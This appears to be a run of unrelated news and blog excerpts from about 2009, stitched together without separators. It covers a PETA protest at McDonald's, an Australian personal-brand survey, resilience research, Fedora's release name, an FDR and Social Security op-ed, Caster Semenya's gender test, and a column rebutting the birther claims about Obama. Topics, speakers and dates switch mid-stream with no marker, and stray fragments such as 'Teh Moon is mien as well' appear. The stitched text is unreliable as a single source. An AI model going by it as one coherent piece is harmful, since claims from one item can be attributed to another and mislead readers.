Look for a smackdown with Ronald McDonald , Unhappy meals for kids , mangled plastic chickens and " blood " filled packets urging McDonald 's to " Ketchup with the times . "
" McDonald 's means McCruelty as far as I 'm concerned , " says Hynde .
Gore !
Clowns !
Blood !
Rock n' roll !
What more could you ask for during a Monday lunch ?
12 noon Monday at McDonald's .
I 'd recommend avoiding the McChicken sandwich .
Talent Inc !‘s Personal Brand Survey Released .
Storm and Brand DNA in a Joint venture with entertainment management company Forum5 have developed a new personal branding consultancy ; Talent Inc !
Recently we combined our forces to put together a report on the strongest Australian personal brands .
The report compiles the responses to the question ; Which Australian has best developed their brand and their brand awareness ?
The result is a list of people who have all been successful in defining who they are and what they stand for .
What we discovered reinforced what we already knew to be true ; having talent alone provides no guarantee of building a strong personal brand .
Those with the strongest personal brands have clearly defined them , consciously built them over time , and consummately leveraged them to achieve the highest return possible for everything they do .
Kylie named at number one
Kylie Minogue came in first on the list with more than double the votes of second place getter Elle Macpherson .
The top ten on the list were :
1. Kylie Minogue
2. Elle Macpherson
3. Shane Warne
4. Dame Edna Everage
5. Greg Norman
6. Steve Irwin
7. Hugh Jackman
8. Nicole Kidman
9. Kevin Rudd
10 . Dick Smith
Here ’s a word cloud we created of the top 100 strongest Australian personal brands showing the relative rankings of the list .
The media has picked - up the survey release and it ’s starting to snowball .
Channel 9 covered us this morning .
If you ’re interested in developing your personal brand , give us a hoy .
Dave .
Yes .
Teh Moon is mien as well .
Share Tweet Stumble Pin It Email
Teaching children how to be more resilient along with regular classroom instruction can improve children 's outlook on life , curb depression and boost grades , according to a researcher who spoke at the American Psychological Association 's convention Saturday .
" In the last 50 years , the U.S. population has seen an increase in their standard of living , such as having more money , owning more homes and cars and living longer .
But our sense of meaning , purpose and satisfaction with life have not gone up , they have gone down , " said psychologist Martin Seligman , PhD , of the University of Pennsylvania .
" This has been especially detrimental to children .
Nearly 20 percent of young people experience depression . "
The effects can carry over to adulthood and cause early death , more health problems , less satisfaction with jobs and relationships and higher rates of depression , he added .
Speaking at the APA 's 117th annual convention , Seligman showed how teaching resilience , positive emotion , and a sense of purpose in school can protect children against depression , increase their life satisfaction and improve their learning power .
The researchers looked at two evidence - based programs , the Penn Resiliency Program ( PRP ) and the Positive Psychology Program ( PPP ) .
The PRP sought to increase students ' ability to handle day - to - day stressors and problems that are common for adolescents .
This program was designed to prevent depression .
The PRP promotes optimism by teaching students to think more realistically and flexibly about the problems they encounter .
PRP also teaches assertiveness , creative brainstorming , decision - making , relaxation and other coping and problem - solving skills .
Seligman and his co-authors reviewed 19 studies from the past 20 years that used PRP .
These included more than 2,000 8 - to 15 - year - olds .
All the studies used adolescents from different racial and ethnic backgrounds and community settings .
The group leaders who taught the skill were all from professional backgrounds .
Based on the students ' assessments of their own feelings , the researchers found that PRP increased optimism and reduced depressive symptoms for up to a year .
The program also reduced hopelessness and clinical levels of depression and anxiety .
Additionally , the PRP worked equally well for children from different racial / ethnic backgrounds .
The program 's effects were strongest when the group leaders were members of the PRP team or trained by them .
Some of the group leaders only read the PRP material and were not trained directly by the PRP team .
The second program , the PPP , sought to help students identify their signature character strengths ( e.g. , kindness , courage , wisdom and perseverance ) and incorporate these strengths in day - to - day life .
The program consisted of 20 to 25 80 - minute sessions delivered during ninth grade .
The students wrote in journals about the activity .
One exercise involved the students ' writing down three good things that happened each day for a week .
Examples were : " I answered a really hard question in Spanish class , " " I helped my mom shop for groceries " or , " The guy I 've liked for months asked me out . "
Next to each positive event , the students answered the following questions : " What does this mean to you ? " and " How can you increase the likelihood of having more of this good thing in the future ? "
To determine the program 's effectiveness , 347 high school students rated their love of learning , kindness , behavioral problems , enjoyment of school and grades .
The students were randomly assigned to a class with the program or to one without .
The teachers and parents also rated the students but were not told who took the program .
The students who took the program reported more enjoyment and engagement in school .
The teachers reported those students were more curious about what they were doing , loved learning and showed more creativity .
Effects were particularly strong for students in regular , non -honors classes .
According to mothers ' and teachers ' reports , the students in the PPP had more empathy , self - control and desire to cooperate and assert themselves .
Teaching children how to foster their own resiliency , purpose in life and positive feelings can bring " new prosperity " to people 's lives , Seligman said .
" It is important to start in the formative school years , so positive thinking and resilience are instilled and available to handle future challenges . "
Source : American Psychological Association ( news : web )
Explore further Research finds schools can help reduce depression
New Yorkers Louisa " Ouisa " Kittredge ( Stockard Channing ) and John Flanders " Flan " Kittredge ( Donald Sutherland ) are upper - class private art dealers , pretentious , but compassionate .
Their prized possession is a double - sided Kandinsky : one side represents control ; the other , chaos .
They relay a story to their friends and acquaintances that becomes legendary over time : their encounter with a young black stranger who came stumbling upon their front door one evening as they were courting Geoffrey Miller ( Sir Ian McKellen ) , an important investor who could make them wealthy beyond their dreams .
The young man , Paul Poitier ( Will Smith ) , had just arrived in the city when he was mugged outside their building , he sported a minor knife wound to the abdomen .
He was a friend of the Kittredges ' children , who are attending Harvard ; more importantly , he 's the son of actor and Director Sidney Poitier .
Tomorrow , Paul is meeting up with his father , who is in town directing a movie of " Cats " .
Beyond the ... Written by Huggo
This is goofy and awesome .
Casey Kasem and David Letterman count down Dave 's Top Ten Numbers From One to Ten .
I think you 'll be surprised which number comes out on top .
( Via Maximumfun.org . )
From the ' Roman Emperors of Sparta ' files :
Red Hat 's Fedora Linux community has now voted in a name for the upcoming Fedora 12 release .
Constantine beat out four other rivals names including : Chilon , Orville , Rugosa and Umbria .
Fedora 12 succeeds Fedora 11 's Leonidas ( a Spartan King ) with the name of a famous Roman Emperor .
It 's actually an interesting metaphor if you follow it through .
Leonidas fought off the invaders with 300 men in a valiant stand .
Constantine on the other hand is the Emperor that brought the Christian religion to the Roman Empire .
As metaphor does that mean that Fedora 12 will bring the Linux religion to the masses ?
In any event , Fedora 12 is still in very early development .
The current release schedule pegs the release date at November 3rd 2009 .
By that point Fedora 12 ( for the desktop ) will be up against Windows 7 ( no cute codename there ) and Ubuntu 's Karmic Koala .
I 've blogged before how the different Linux distribution all have very different code names .
Ubuntu has its ' cute ' animal names , openSUSE has its German philosophers , Debian is still stuck on Toy Story and Fedora seems to be fixated now on Kings and Emperors of antiquity .
The 523 - foot - long Vandenberg served as a troop transport in World War Two and a missile - tracking radar ship during the Cold War .
Now it forms the second largest intentionally created artificial reef in the world .
Reef health is important for southern Florida both because of the tourism dollars it brings in , and because the the reef formed over the Vandenberg will help preserve biodiversity in the Florida Keys National Marine Sanctuary by drawing tourists away from the more ecologically fragile natural reefs .
According to the National Oceanic and Atmospheric Administration , the Florida Reef track in the Marine Sanctuary is the third longest coral reef area in the world , after the Great Barrier Reef of Australia and the Belizian Barrier Reef of , well , Belize .
Opponents have unleashed a torrent of hyperbolic claims and heated invective in an effort to stop President Obama ’s healthcare reform .
But the president should n’t be surprised by the rhetoric .
Three - quarters of a century ago , nearly identical denunciations were used in an attempt to kill legislation that created one of the country ’s most popular government programs : Social Security .
Though no one was talking about “ death panels ” back then , opponents claimed that Social Security would result in massive government control .
A Republican congressman from New York , for example , charged : “ The lash of the dictator will be felt , and 25 million free American citizens will for the first time submit themselves to a fingerprint test . ”
Another New York congressman put it this way : “ The bill opens the door and invites the entrance into the political field of a power so vast , so powerful as to threaten the integrity of our institutions and to pull the pillars of the temple down upon the heads of our descendants . ”
A Republican senator from Delaware claimed that Social Security would “ end the progress of a great country and bring its people to the level of the average European . ”
Advertisement
Today , opponents of a public health insurance option claim that it would drive private health insurance out of business and put a bureaucrat between doctors and patients .
Back then , opponents of Social Security warned that it would “ establish a bureaucracy in the field of insurance in competition with private business ” that would “ destroy ” private pensions .
Then as now , opponents played the socialism card .
In hearings before the Senate Finance Committee , a senator from Oklahoma accusingly asked President Franklin D. Roosevelt ’s secretary of Labor , Frances Perkins , “ Is n’t this socialism ? ”
When Perkins emphatically answered no , the senator leaned forward and , with a conspiratorial whisper , pressed , “ Is n’t this a teeny - weeny bit of socialism ? ”
Unlike today , however , the political rhetoric never gained traction in 1935 .
Though nearly every Republican in Congress was vehemently opposed to Social Security , Roosevelt prevented them from controlling the debate .
Months before Congress was presented with legislation , FDR sought to immunize the public .
In a series of fireside chats and other broadcasts , the president anticipated arguments and responded before public opposition got out of control .
“ A few timid people , who fear progress , will try to give you new and strange names for what we are doing , ” he said in one talk .
“ Sometimes they will call it ‘ fascism , ’ sometimes ‘ communism , ’ sometimes ‘ regimentation , ’ sometimes ‘ socialism . ’
But , in so doing , they are trying to make very complex and theoretical something that is really very simple and very practical .
... I believe that what we are doing today is a necessary fulfillment of what Americans have always been doing -- a fulfillment of old and tested American ideals .
Advertisement
In order to generate both sound legislation and broad - based support , Roosevelt established an interagency committee with a professional staff to craft the legislation and an advisory council made up of sympathetic representatives of business , labor and the general public , carefully balanced with Republicans and Democrats , to endorse and explain the new program .
When the legislation was introduced in Congress on Jan. 17 , 1935 , the president delivered a message asking for speedy action , and , once again , he framed the debate .
His legislation , he explained , “ has not attempted the impossible , nor has it failed to exercise sound caution and consideration of all of the factors concerned , [ including ] ... the capacity of industry to assume financial responsibilities and the fundamental necessity of proceeding in a manner that will merit the enthusiastic support of citizens of all sorts . ”
He concluded forcefully .
“ No one can guarantee this country against the dangers of future depressions , but we can reduce these dangers .
...
This plan for economic security is at once a measure of prevention and a method of alleviation .
We pay now for the dreadful consequence of economic insecurity -- and dearly .
This plan presents a more equitable and infinitely less expensive means of meeting these costs .
We cannot afford to neglect the plain duty before us .
I strongly recommend action . ”
And Congress did act .
Social Security was signed into law 74 years ago today .
Advertisement
It may be too late for President Obama to frame and control the debate over healthcare reform .
But if he is to have a successful administration , he should learn from FDR .
Like Roosevelt , he must talk directly to the American people .
He must clearly demonstrate with words and deeds , as FDR did , that he is fighting for the interests of Main Street , not Wall Street .
He should frame future debates on his terms -- before opposing politicians shape the message their way .
By emulating FDR , Obama will find the bipartisanship he seeks , not inside the halls of Congress but among a broad cross section of Americans who are focused on pragmatic solutions rather than partisan advantage .
The parallels between the challenges faced by Obama and Roosevelt are many .
Like FDR , Obama is confronted with economic collapse and deadly fighting overseas .
The two men have similar strengths as well .
Like Obama , FDR was an eloquent orator and an inspiring leader .
If Obama follows Roosevelt ’s lead , he , like FDR , may well produce a legacy that grateful Americans will be writing and talking about three - quarters of a century from now .
At least 19 inmates have been killed and more than 20 injured in a riot in a prison in the northern Mexican state of Durango , security officials say .
Smoke was seen rising from the prison in the town of Gomez Palacio , and gunshots were heard .
Officials said the violence resulted from rivalry between gangs in the jail .
State official Jorge Torres said that while the situation was now calm the overall atmosphere was tense .
He described the prison as a " time bomb " .
He told Mexican TV the fighting was a " dispute for dominance " and suggested that inmates being held on federal drug and organised crime - related charges might be behind the violence .
' Dynamics disturbed '
" We have a significant number of criminals linked to organised crime , " he said , quoted by the Associated Press news agency .
" I think it is precisely the federal inmates who disturb the internal dynamics of the penitentiary , and they place the governance of it at constant risk . "
Durango has been the scene of clashes between the Gulf and Sinaloa drug cartels in recent months .
President Felipe Calderon has declared war on the illegal narcotic organisation in Mexico , deploying 40,000 troops to fight the cartels .
Thousands have been killed in drug - related violence in the last few years .
Drug gangs have been involved previously in prison escapes and rioting .
In May , an armed gang believed to be linked to the Gulf cartel broke into a jail in the state of Zacatecas and freed more than 50 inmates .
AT FIRST glance it looked as if Malcolm Turnbull , Australia 's opposition leader , had fired a deadly bolt at Kevin Rudd , the prime minister .
In blocking the government 's legislation on climate change , Mr Turnbull seemed to thwart the prime minister on the issue he has made his signature since leading the Labor Party to power in 2007 .
Mr Rudd has wanted the scheme , which is to set targets for Australia 's carbon - emissions reductions , ready for December 's climate conference in Copenhagen .
But Mr Turnbull might have thrown a boomerang , making him victim of his own attack .
Mr Turnbull is a lustrous figure in Australian politics .
Having entered parliament only in 2004 , less than a year ago he took over the leadership of the conservative Liberal Party .
He promised to shift the opposition 's main party back towards the centre , after more than a decade tacking to the right under John Howard .
An ex-journalist and lawyer , who made a fortune in Sydney 's business world , Mr Turnbull once led Australia 's republican movement .
But politics has dulled his sparkle .
A poll released on August 10th showed only 26 % of voters approving of his performance , a plunge of 18 points since mid-June .
Almost four times as many voters prefer Mr Rudd as prime minister .
The figures reflect two setbacks , each partly of Mr Turnbull 's own making .
In June , Mr Turnbull called for Mr Rudd 's resignation , citing a leaked e-mail about a plan to help car - dealers stricken by the credit crunch .
The e-mail purported to show that the prime minister 's office had asked the Treasury to help a friend of Mr Rudd's .
But on August 4th Godwin Grech , a Treasury official who testified about it to parliament , confessed that he had faked the document himself .
Mr Grech , it emerged , had shown it on June 12th to Mr Turnbull , who then believed it to be real .
Mr Grech has since been hospitalised for depression .
A report by the federal auditor cleared Mr Rudd of any wrongdoing .
The “ OzCar affair ” has dimmed many Liberal parliamentarians ' view of Mr Turnbull 's judgment .
A television profile aired on August 3rd hardly helped : by chance , the cameras were in his office the day the forgery was exposed .
Peter Costello , a senior Liberal who once coveted Mr Turnbull 's job , has groused about his lack of caution .
Divisions have sharpened between the party 's centrist wing and the Howard - era hardliners who resent Mr Turnbull 's ego and his reformist instincts .
The same divisions have shaken Mr Turnbull 's bid to shape the Liberals ' approach to climate change .
Like the government , he supports a cap - and - trade scheme , allowing polluters to buy and sell permits for their carbon emissions .
Such legislation has already passed the parliament 's lower house , in June .
But conservatives contend the scheme will damage business and farming and send jobs offshore .
Wilson Tuckey , one of them , accuses Mr Turnbull of “ inexperience and arrogance ” .
To placate them , Mr Turnbull committed his coalition to voting against the bill when it came before the upper house , on August 13th .
This aligned the Liberals with the Greens , who think the legislation too weak , and denied it a majority .
The government can reintroduce the bill later this year , then call a general election if it is defeated a second time .
Given his coalition 's disastrous polling , Mr Turnbull is desperate to avoid that .
He says he will negotiate amendments with the government when the legislation returns in November .
Even if Mr Rudd 's scheme survives then , there is no guarantee that Mr Turnbull 's leadership will be so lucky .
Have you ever had a medical question that you were too embarrassed to ask a friend , family member , or even your doctor ?
Are you tired of the establishment medical sites that sugar coat their information and wo n’t show you the pictures you need to see ?
Unlike most healthcare web sites , afraidtoask.com offers in - depth information and graphic photographs that will give you a better understanding of highly personal health issues .
After reviewing our disclaimer , and privacy policy , pick from one of hundreds of topics , search the site , join our community , or just surf about .
To get a personalized answer to your question , post to our user board .
WASHINGTON ( Reuters ) - The U.S. Federal Trade Commission said it will continue to investigate the relationship between the boards of Apple Inc and Google Inc , after Google ’s chief quit Apple ’s board on Monday .
Google CEO Eric Schmidt talks to a reporter at the Sun Valley Inn in Sun Valley , Idaho July 9 , 2009 .
REUTERS / Rick Wilking
Richard Feinstein , director of the FTC ’s bureau of competition , commended both companies for recognizing that sharing directors raises competitive issues , in light of the resignation of Google Chief Executive Eric Schmidt from Apple ’s board .
Feinstein said regulators have been investigating the Google - Apple tie for “ some time , ” even as the two companies increasingly compete with each other in markets such as smartphones and operating systems .
“ We will continue to investigate remaining interlocking directorates between the companies , ” Feinstein said .
Antitrust experts say , typically , a resignation like Schmidt ’s would have closed the FTC investigation .
But because one other person still sat on the boards of both companies , the agency was not likely to close its investigation down yet .
Former Genentech CEO Arthur Levinson remains a director of both companies .
“ Generally it would have shut down the investigation because they ( regulators ) achieved what they wanted to achieve , ” said Gary Reback at the law firm of Carr & Ferrell .
A consumer rights group criticized Schmidt for taking too long to leave Apple ’s board and called on Levinson to choose either Apple or Google .
“ Nonetheless , we ’re glad Schmidt finally did the right thing , ” Consumer Watchdog said in a statement .
“ We call on Levinson to act responsibly and choose one company or the other . ”
David Turetsky , a former deputy assistant attorney general for antitrust under the Clinton administration , said Levinson ’s dual position could be why the FTC is leaving the probe open .
“ As the convergence of their two businesses happens , it is no doubt hard to have overlapping directors , ” said Turetsky , co-chair of the antitrust practice at Dewey & LeBoeuf .
“ Schmidt did the right thing . ”
Experts said an end to the FTC investigation would have done little to reduce the regulatory spotlight on Google in Washington mainly because of the company ’s market share .
Google , the No. 1 Internet search engine and provider of text - based search ads , has been praised for being a successful American company , but that success comes with increasing scrutiny from regulators .
In another investigation , the Justice Department is looking at Google ’s settlement with the Authors Guild and Association of American Publishers that would allow it to create a massive , online digital library .
“ Google is in the sights of regulators , ” said a former FTC antitrust attorney under the Clinton administration , who declined to be named .
“ This is just the first of many instances where they are going to encounter regulatory scrutiny . ”
Last Friday , the Federal Communications Commission sent letters to Apple , Google and AT&T Inc seeking information about why Apple rejected Google ’s voice application for the iPhone .
AT&T is the exclusive carrier for the Apple ’s popular iPhone in the United States .
“ Asking questions ca n’t hurt , ” FCC Commissioner Robert McDowell said in an interview with Reuters on Monday .
“ Responses to the letters could be helpful . ”
The FCC ’s inquiries come at a time when its chairman , Julius Genachowski , is looking into the ability of consumers to choose their mobile handsets and how these arrangements also affect competition and innovation .
America has allowed sex selection - known by its supporters as " family balancing " - since 2001 , but US pro-life groups have criticised the destruction of embryos deemed undesirable .
Earlier this year , the Pope attacked the " obsessive search for the perfect child " and said a " new mentality is creeping in that tends to justify a different consideration of life and personal dignity " .
This is Amy Barzdukas , a general manager in charge of Microsoft 's Internet Explorer .
And she may be smiling in the photo , but nowadays she 's bitching a lot .
The reason ?
Firefox 's one billion downloads claim :
As with any marketing statement , I 'd encourage people to be somewhat sceptical about large number claims .
It 's an interesting number and I have not seen the math [ but ] how many internet connected users are there ?
1.1 billion , 1.5 billion , something in that area .
Advertisement
She described the number as " interesting math , " even while that 1 billion figure includes every download and update since Firefox launched since 2004 .
Repeated downloads too .
And people having multiple computers .
Knowing that , it does n't seem that crazy to me .
What do you think about Amy 's claims ?
And about Firefox figure ?
[ The Guardian ]
What 's so great about sex ?
From an evolutionary perspective , the answer is not as obvious as one might think .
An article published in the July issue of the American Naturalist suggests that sex may have evolved in part as a defense against parasites .
Despite its central role in biology , sex is a bit of an evolutionary mystery .
Reproducing without sex — like microbes , some plants and even a few reptiles — would seem like a better way to go .
Every individual in an asexual species has the ability to reproduce on its own .
But in sexual species , two individuals have to combine in order to reproduce one offspring .
That gives each generation of asexuals twice the reproductive capacity of sexuals .
Why then is sex the dominant strategy when the do - it - yourself approach is so much more efficient ?
One hypothesis is that parasites keep asexual organisms from getting too plentiful .
When an asexual creature reproduces , it makes clones — exact genetic copies of itself .
Since each clone has the same genes , each has the same genetic vulnerabilities to parasites .
If a parasite emerges that can exploit those vulnerabilities , it can wipe out the whole population .
On the other hand , sexual offspring are genetically unique , often with different parasite vulnerabilities .
So a parasite that can destroy some can't necessarily destroy all .
That , in theory , should help sexual populations maintain stability , while asexual populations face extinction at the hands of parasites .
The scenario works on mathematical models , but there have been few attempts to see if it holds in nature .
Enter Potamopyrgus antipodarum , a snail common in fresh water lakes in New Zealand .
What makes these snails interesting is that there are sexual and asexual versions .
They provide scientists with an opportunity to compare the two versions side - by - side in nature .
Jukka Jokela of the Swiss Federal Institute of Aquatic Science and Technology , Mark Dybdahl of the University of Washington and Curtis Lively of Indian University , Bloomington began observing several populations of these snails for ten years starting in 1994 .
They monitored the number of sexuals , the number asexuals , and the rates of parasite infection for both .
The team found that clones that were plentiful at the beginning of the study became more susceptible to parasites over time .
As parasite infections increased , the once plentiful clones dwindled dramatically in number .
Some clonal types disappeared entirely .
Meanwhile , sexual snail populations remained much more stable over time .
This , the authors say , is exactly the pattern predicted by the parasite hypothesis .
" The rise and fall of these female - only lineages was surprisingly fast and consistent with the prediction of the parasite hypothesis for sex , " Jokela said .
" These results suggest that sexual reproduction provides an evolutionary advantage in parasite rich environments . "
So we may well have to thank parasites — in spite of their nasty reputation — for the joy of sex .
If you 're new here , you may want to subscribe to the If you 're new here , you may want to subscribe to the RSS feed for this blog .
Thanks for visiting !
Where should effort go to be highly visible in keyword searches with Google ?
A precise answer probably demands an evaluation of all the Google Search Engine Ranking Factors like that done by SEOmoz .
However the Google search debate normally seems to revolve around Content or Links .
Mark Jackson stated quite categorically The Golden Rule of SEO : Content is King .
Aaron
Wall also commented that although there are those who push for linking , Content is King when you get down to it .
The debate is ongoing and there are even those who stay on the fence and declare both content and inbound linking is king .
How should you budget your effort then in trying to improve rankings in Google keyword searches ?
Should it be equal effort on content and links or some other ratio ?
That is a false dichotomy since there is another equally important website dimension that does not even feature in this debate .
Indeed if you look at the hot issues in the past two months in SEO , that third dimension has been the one the experts have been talking about .
The third leg of the tripod is the website architecture .
It deserves equal effort as illustrated in the following table , which is derived from a chart in an article on Key SEO Services .
In this table , the Plus value is a reminder of the Upsides that can be created by working on this aspect .
The Minus value indicates the Downsides if this aspect is handled poorly .
Triple Power SEO Architecture Content Links Plus – Visibility Plus – Appeal Plus – Authority Minus – Barriers to search engines Minus – Spam Minus – Penalties Monitor >>
Measure >>
Manage >>
Improve
It is somewhat surprising website architecture gets so little air time given its importance .
It can be complex but a great deal of improvement can be obtained with very simple methods .
It is likely that the vast majority of websites that do not perform well in Google keyword searches suffer from website architecture problems .
Yet much progress can be made with some of the most basic tools .
For example , the Xenu Link Sleuth ( TM ) will find broken links on web sites , which can be a major problem for the search engine spiders .
It crawls the website in exactly the way a search engine spider does .
Google itself provides a great deal of information through its Google Webmaster Tools website .
If you have Google Analytics or Google Adsense ads on your website , then both give statistics that often pinpoint problems in the website architecture .
Efforts put into correction efforts will have clear and certain results , unlike those hoped for when efforts go into content or links .
The aim of this article was to discuss the high level allocation of effort rather than to provide a compendium of website architecture problem areas and solutions .
If you need assistance then a group like the Web Marketing Group would meet your needs .
For further reading , we can recommend an article by Richard Baxter , Diagnose Critical Website Architecture Issues for SEO .
He also has a slide show of the presentation he gave at SMX London 2009 on the same topic .
It ’s very good value if you want pointers on how to put effort into this priority SEO dimension .
The researchers started their study by having large simulated crowds of people bottleneck around small exits , and then introduced obstacles that everyone would have to avoid in order to reach the exit .
Most of the time , the obstacles reduced the number of people able to exit per minute .
Surprisingly , they found more people could escape in less time if an obstacle was placed about 30 degrees to either the right or left side of an exit door .
" Contrary to our intuition , the obstruction by the obstacle increases the pedestrian outflow in a certain case , since it decreases conflicts among pedestrians , " Yanagisawa said .
Researchers found that having an inanimate pole take up the space of a person reduced the number of time - consuming conflicts between people near the exit .
Similarly , the pole 's placement slightly off to one side of the doorway reduced the time it took for a person coming from the other direction to turn toward the exit .
To test their results , the researchers went to the studio of a local TV station and watched 50 volunteers exit through a narrow door .
They found that the crowd of real people closely mirrored the researcher 's previous computer predictions .
Likewise , when they placed a pole to one side of the exit , the people were able to exit faster than when there was no obstruction at all .
Yanagisawa 's team was the first to put this into mathematical terms .
" I believe that our work will help design better and more efficient fire escapes since our model gives us the value of pedestrian outflows based on both theoretical and experimental study , " Yanagisawa said .
During the experiment , the team also found that people exiting in a single - file line were by far the most efficient .
Yanagisawa said that the next step is to program models of people intelligent enough to self - organize into a line .
Mike Lucibella
BERLIN -- South Africa 's track and field federation has been asked to conduct a gender test on an 800 - meter runner amid concerns she does not meet the requirements to compete as a woman .
Caster Semenya , 18 , won the 800 meters at the world championships with a stunningly dominating run .
Semenya took the lead halfway through the race Wednesday and won in a world - leading 1 minute , 55.45 seconds , beating defending champion Janeth Jepkosgei of Kenya by a massive 2.45 seconds .
Jennifer Meadows of Britain took bronze .
The world track and field federation requested the gender test about three weeks ago , after Semenya burst onto the scene by improving her personal bests in the 800 and 1,500 by huge margins .
South Africa 's Caster Semenya caught the IAAF 's attention by greatly improving her personal bests in the 800 and 1,500 .
Thomas Lohnes / AFP / Getty Images
IAAF spokesman Nick Davies said the " extremely complex , difficult " test has been started but that the results were not expected for weeks .
Semenya qualified for Wednesday 's final with a top time of 1 minute , 58.64 seconds .
She posted the world 's best time this year of 1:56.72 three weeks ago at the African junior championships in Bambous , Mauritius .
Davies stressed that " it 's a medical issue , not an issue of cheating . "
The verification requires a physical medical evaluation , and includes reports from a gynecologist , endocrinologist , psychologist , an internal medicine specialist and an expert on gender .
" So we 're talking about reports that are very long , very time consuming , " Davies said .
South Africa team manager Phiwe Mlangeni - Tsholetsane would not confirm that Semenya was having a gender test , but said " there was no cheating on our part . "
" We entered Caster as a woman and we want to keep it that way , " Mlangeni - Tsholetsane said .
" Our conscience is clear in terms of Caster .
We have no reservations at all about that . "
It was not clear what would happen if Semenya were to medal in Wednesday 's final and the test results determined she does not meet the requirements to compete .
" I can't say that if ' X ' happens in the future that we will , for example , retroactively strip results .
It 's legally very complex , " Davies said .
" If there 's a problem and it turns out that there 's been a fraud ... that someone has changed sex , then obviously it would be much easier to strip results , " Davies added .
" However , if it 's a natural thing and the athlete has always thought she 's a woman or been a woman , it 's not exactly cheating . "
He said a decision in such instances is " done on a case by case basis . "
" It 's something that would have to be considered by the legal experts at that time , " Davies said .
Although medals will be awarded for the 800 , the race remains under a cloud until the investigation is closed , and Semenya could be stripped of the gold depending on the test results , IAAF general secretary Pierre Weiss said .
" But today there is no proof and the benefit of doubt must always be in favor of the athlete , " Weiss said .
Semenya 's father , Jacob Semenya , pleaded : " I wish they would leave my daughter alone . "
" She is my little girl .
I raised her and I have never doubted her gender .
She is a woman and I can repeat that a million times , " Semenya told the Sowetan newspaper .
Semenya 's paternal grandmother , Maputhi Sekgala , also spoke in defense of Semenya .
" The controversy does n't bother me that much because I know she 's a woman -- I raised her myself , " Sekgala told The Times , another South African newspaper .
" What can I do when they call her a man , when she 's really not a man ?
It is God who made her look that way , " Sekgala said .
Gideon Sam , the president of the SASCOC -- South Africa 's Olympic governing body -- congratulated Semenya on a " truly remarkable achievement , " the South African Press Association reported .
" We condemn the way she was linked with such media speculation and allegation , especially on a day she ran in the final of her first major world event .
It 's the biggest day of her life , " Sam said .
Morris Gilbert , a media consultant for TuksSport , the University of Pretoria 's sports department , said the issue of Semenya 's gender has not been raised since the 18 - year - old freshman began attending the university .
" It 's the first time in South African sport that we have had a gender issue , " he said .
He said the university would not get involved in the recent controversy over her gender .
" We are all very proud of her and of what she 's achieved , " he said .
" The university stands behind her all the way . "
He attributed her recent success to hard work and rigorous training .
" She trains a lot , " he said .
" If you go to the athletics track , you 're sure to find her there .
I do n't think she had really good training before she came to the university .
She 's from a very poor area . "
He added : " We had a look this morning , of all the fastest times in the world , she 's only ranked 21 .
So there are a lot of women who run faster . "
Semenya is majoring in sports science , he said .
Semenya 's rivals said they tried not to dwell on the issue before the race .
" I 've heard a lot of speculation , but all I could do was just keep a level head and go about my business , " Meadows said .
" If none of it 's true , I feel very sorry for her . "
One thing not in doubt was Semenya 's outstanding run .
" Nobody else in the world can do that sort of time at the moment , " Meadows said .
" She obviously took the race by storm . "
Information from The Associated Press was used in this report .
When Barack Obama delivered the speech to the Democratic party convention in 2004 that launched his national career , he began by telling his own compelling personal story : " Let 's face it , my presence on this stage is pretty unlikely .
My father was a foreign student , born and raised in a small village in Kenya …
While studying here , my father met my mother .
She was born in a town on the other side of the world , in Kansas . "
He went on to tell his parents ' story as a quintessentially American tale of love , hope and aspiration .
" My parents shared not only an improbable love , " Obama told the rapt Democrats , " they shared an abiding faith in the possibilities of this nation .
They would give me an African name , Barack , or ' blessed ' , believing that in a tolerant America , your name is no barrier to success . "
But as Obama prepares to celebrate his birthday on Tuesday there are others who would suggest that his appearance that night was not just probable but plotted – part of a long - running conspiracy by foreign Muslim forces to take over the United States .
In the alternative version , his white grandparents were so displeased at the race of his mother 's fiance that his mother fled to Kenya .
Once there , she was repulsed by the manner in which Muslim men treated their wives , but was now too pregnant to fly home and so remained in Mombasa , where the heat brought on early labour .
A local imam was kind enough to lead the festivities and called the boy Obama .
The details change , but the basic storyline remains the same .
Obama should not be president because his occupancy of the White House contravenes article two , section one of the US constitution , which stipulates that only a " natural - born citizen " is eligible for the presidency .
He is not just un -American but non-American ; a faux candidate foisted on America by way of Mombasa rather than Manchuria .
Such are the claims of the American " birther " movement .
The aim here is not prove these people wrong .
That has been achieved several times over .
For them to be right , Obama would have had to persuade the state of Hawaii to collude in forging a birth certificate that has been verified by its Republican governor and director of health as well as the nonpartisan factcheck.org .
Moreover , his mother would have had to have the foresight to place birth announcements claiming he was born in the US in both the Honolulu Advertiser and the Hawaii Star Bulletin , 48 years ago , in anticipation of a future presidential run – otherwise , why bother ?
When you think of the time and effort that must have gone into this cover - up , Obama 's election must go down as the most elaborate affirmative - action sting in US history .
Facts wo n't budge them .
The smart ones insist they are just doing him a favour .
" What I do n't understand is why he has n't produced [ his birth certificate ] to get this noise out of the way . "
Cutting " legitimate doubt " from whole cloth , they create accusations to which the only defence would be to disprove a negative .
( How do we know Obama was not enrolled into a school in Indonesia as Barry Soetoro ? )
Posing as reasonable people asking reasonable questions , many insist that their interest is not in stoking the controversy , but ending it .
" I do believe the president is a citizen of the United States folks , do n't you ? " asks CNN 's resident xenophobe , Lou Dobbs .
" But I do have a couple of little questions , like you .
Why not just provide a copy of the birth certificate ? "
When proof is provided , the inconvenient evidence is denied , parsed , undermined or overlooked .
Hawaii has produced a certificate of live birth which it both issues and accepts as proof of citizenship .
So the birthers demand his full certificate and claim that the document provided is a fraud .
Meanwhile , in the absence of tangible proof , birthers are sustained by claims that are variably random , unsubstantiable , insubstantial , untraceable or incredible – and often all five .
In November the grandson of the Kenyan imam who allegedly delivered Obama in Mombasa was reported to be on his way to England to claim asylum because he feared the Kenyan authorities would silence him .
Which brings us on to the final , crucial part of the birther identity : victimhood .
The leftwing media are hounding them and the government is marginalising them .
If you can't say what happened to the grandson of that Kenyan imam you 'd never heard of , then how do you know the authorities did n't finish him off ?
And so they turn banality into controversy , truth into speculation , certainty in doubt and the world on its head .
Having made up the news , they demand to know why no one is reporting it .
So why dignify these people with column inches when you could just laugh and move on ?
If they truly are brain - dead , then surely the oxygen of publicity only keeps their contributions in their present vegetative state .
There is something to that .
But while to engage them is clearly futile , to dismiss them would be reckless , for two main reasons .
First , the birthers are anything but a fringe group .
They have found a sizeable audience for their fantasy .
A poll last week showed that more than half of Republicans either believe Obama was not born in the US ( 28 % ) or are not sure ( 30 % ) .
Mainstream anchors on CNN and Fox routinely give them credibility .
So far , 11 Republican congressmen have signed a " birther bill " that would demand a birth certificate from all future presidents .
